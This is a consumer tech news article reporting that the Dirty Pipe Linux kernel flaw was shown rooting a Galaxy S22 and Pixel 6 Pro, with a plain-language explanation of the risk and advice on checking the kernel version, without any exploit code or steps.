Earlier today, @Fire30_ shared a video on Twitter demonstrating how to exploit the new Dirty Pipe Linux kernel vulnerability to gain root on Android on a Galaxy S22 and Pixel 6 Pro, both of which appear to be up to date with security patches. In each case, root access was obtained in less than a minute with minimal effort, allowing for both a simple root approach that enthusiasts would appreciate and a slew of severe security problems.
If you haven't been keeping up with the news, a new kernel-level vulnerability known as Dirty Pipe was just uncovered. It's complicated, but the short version is that software running on recent versions of the Linux Kernel can gain privilege escalation (i.e., gain root access, among other things) due to how the kernel handles reading and writing data in "pipes," with a bug allowing you to write data to a target file when you shouldn't be able to.
If done correctly, this can be used to execute arbitrary code, which is a fancy way of saying an app or piece of software can do pretty much anything it wants within other technical constraints, such as reading things it shouldn't have access to and performing operations that should require permissions it doesn't have. The problem affects devices that use Linux kernels 5.8 and later, including Android.
Fixes for the Linux kernel have already been issued, and Android is anticipated to resolve the problem in a forthcoming monthly patch level. We haven't heard of the exploit being utilised in the wild yet, but that is sure to change.
The video, which was shared on Twitter, shows both a Samsung Galaxy S22 and a Google Pixel 6 Pro gaining root access via the Dirty Pipe vulnerability, and even switching the phones into a permissive SELinux state. All of this serves as an example of the potential harm. Apps have practically unlimited root-level access, and when SELinux is switched to permissive mode, many of an Android device's critical security protections are disabled. In essence, it's nearly totally "owned," as the old computer jargon goes.
According to a security researcher, the effect of the vulnerability may still be dependent on various mitigating variables, in addition to the basic software requirements of requiring a very latest kernel version. The great majority of Android devices are now running earlier versions of the Linux kernel, which are unaffected.
Finally, while the video depicts an external device gaining access to a root shell, I've been assured that the exploit is probably definitely capable of occurring wholly on-device in a purely app-based approach based on what's been demonstrated. Enthusiasts may be salivating since it's a way for obtaining presumably non-permanent root access on Samsung phones, right past the company's less-than-hardened Knox protection. Even without altering the system for permanent root (which would activate additional detection mechanisms and cause other concerns), an app might just wait for a boot broadcast and achieve non-persistent root at that moment. Of course, an app might use all of this for more malicious purposes.
A rogue programme with root access may have a significant impact, potentially stealing your files, images, messages, and other data, among other things. Without going into too many applications, this is a very critical and severe vulnerability.
Again, we are not aware of any active in-the-wild usage of the vulnerability, and only a tiny proportion of very recently launched devices are expected to be vulnerable. Check your current kernel version (typically in Settings -> About, mentioned in "software information" on Samsung phones, "Android version" on Pixels) if you're concerned. If the specified kernel version is less than 5.8, the exploit will most likely not work on your phone.
It is conceivable that Google will improve Play Protect to limit the odds of you installing an app that has the vulnerability (either officially or by sideloading from unknown sources). We contacted Google for further information, but the corporation did not react promptly to our inquiries. In the meanwhile, if you have a phone that may be impacted, it may be best to stick to installing apps from trusted sources.
